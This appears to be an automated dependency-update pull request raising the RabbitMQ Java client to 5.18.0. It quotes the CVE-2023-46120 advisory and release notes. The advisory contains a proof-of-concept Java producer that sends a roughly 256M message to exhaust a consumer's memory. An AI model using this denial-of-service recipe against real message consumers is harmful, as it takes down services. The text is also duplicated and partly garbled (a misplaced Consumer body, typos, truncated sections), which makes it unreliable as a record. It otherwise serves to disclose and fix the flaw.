maxBodyLebgth was not used when receiving Message objects. Attackers could just send a very large Message causing a memory overflow and triggering an OOM Error.
PoC
RbbitMQ
Use RabbitMQ 3.11.16 as MQ and specify Message Body size 512M (here it only needs to be larger than the Consumer memory)
Start RabbitMQ
Producer
Build a String of length 256M and send it to Consumer
public static void main(String[] args) {
ApplicationContext context = new AnnotationConfigApplicationContext(HelloWorldConfiguration.class);
AmqpTemplate amqpTemplate = context.getBean(AmqpTemplate.class);
Object o = amqpTemplate.receiveAndConvert();
if(o != null){
String s = o.toString();
System.out.println("Received Length : " + s.length());
}else{
System.out.println("null");
}
}
}
#### Results
* Run the Producer first, then the Consumer
* Consumer throws OOM Exception
### Impact
Users of RabbitMQ may suffer from DoS attacks from RabbitMQ Java client which will ultimately exhaust the memory of the consumer.
---
### Release Notes
<details>
<summary>rabbitmq/rabbitmq-java-client (com.rabbitmq:amqp-client)</summary>
### [`v5.18.0`](https://togithub.com/rabbitmq/rabbitmq-java-client/releases/tag/v5.18.0)
[Compare Source](https://togithub.com/rabbitmq/rabbitmq-java-client/compare/v5.17.1...v5.18.0)
### Changes between 5.17.0 and 5.18.0
This is a minor release with usability improvements and dependency upgrades. It is compatible with 5.17.x. All users of the 5.x.x series are encouraged to upgrade.
Inbound message size is now enforced, with default limit being 64 MiB.
Thanks to [@​JHahnHRO](https://togithub.com/JHahnHRO) and Sérgio Faria ([@​sergio91pt](https://togithub.com/sergio91pt)) for their contribution.
#### Add ability to specify maximum message size
GitHub issue: [#​1062](https://togithub.com/rabbitmq/rabbitmq-java-client/issues/1062)
#### Do not confirmSelect more than once per channel
GitHub PR: [#​1057](https://togithub.com/rabbitmq/rabbitmq-java-client/issues/1057)
#### Make RpcClient (Auto)Closeable
GitHub issue: [#​1032](https://togithub.com/rabbitmq/rabbitmq-java-client/issues/1032)
#### Bump dependencies
GitHub issue: [#​999](https://togithub.com/rabbitmq/rabbitmq-java-client/issues/999)
### Dependency
#### Maven
```xml
<dependency>
<groupId>com.rabbitmq</groupId>
<artifactId>amqp-client</artifactId>
<version>5.18.0</version>
</dependency>
This is a minor release with bug fixes, usability improvements, and dependency upgrades. It is compatible with 5.16.x. All users of the 5.x.x series are encouraged to upgrade.
Thanks to Nikita Nefedov (@nikita2206) for his contribution.
Remove hard dependency on Jackson in OAuth 2 support
This PR contains the following updates:
5.16.0
->5.18.0
GitHub Vulnerability Alerts
CVE-2023-46120
Summary
maxBodyLebgth
was not used when receiving Message objects. Attackers could just send a very large Message causing a memory overflow and triggering an OOM Error.PoC
RbbitMQ
Producer
package org.springframework.amqp.helloworld;
import org.springframework.amqp.core.AmqpTemplate; import org.springframework.context.ApplicationContext; import org.springframework.context.annotation.AnnotationConfigApplicationContext;
public class Producer { public static void main(String[] args) { ApplicationContext context = new AnnotationConfigApplicationContext(HelloWorldConfiguration.class); AmqpTemplate amqpTemplate = context.getBean(AmqpTemplate.class); String s = "A"; for(int i=0;i<28;++i){ s = s + s; System.out.println(i); } amqpTemplate.convertAndSend(s); System.out.println("Send Finish"); } }
package org.springframework.amqp.helloworld;
import org.springframework.amqp.core.AmqpTemplate; import org.springframework.amqp.core.Message; import org.springframework.context.ApplicationContext; import org.springframework.context.annotation.AnnotationConfigApplicationContext;
public class Consumer {
}
Gradle
v5.17.1
Compare Source
Changes between 5.17.0 and 5.17.1
This is a minor release with a usability improvement. It is compatible with 5.17.0.
Inbound message size is now enforced, with the default limit being 64 MiB.
Add ability to specify maximum message size
GitHub issue: #1062
v5.17.0
Compare Source
Changes between 5.16.0 and 5.17.0
This is a minor release with bug fixes, usability improvements, and dependency upgrades. It is compatible with 5.16.x. All users of the 5.x.x series are encouraged to upgrade.
Thanks to Nikita Nefedov (@nikita2206) for his contribution.
Remove hard dependency on Jackson in OAuth 2 support
GitHub PR: #969
NPE in
AbstractMetricsCollector
when channel limit is exceededGitHub issue: #944
Report publish failures for the closed channel as well
GitHub PR: #943
Remove dependency on java.sql.Timestamp
GitHub PR: #878
Bump dependencies
GitHub issue: #848
Dependency
Maven
Gradle
v5.16.1
Compare Source
Changes between 5.16.0 and 5.16.1
This is a minor release with a usability improvement. It is compatible with 5.16.0.
Inbound message size is now enforced, with the default limit being 64 MiB.
Add ability to specify maximum message size
GitHub issue: #1062
Configuration
📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about this update again.
This PR has been generated by Mend Renovate. View repository job log here.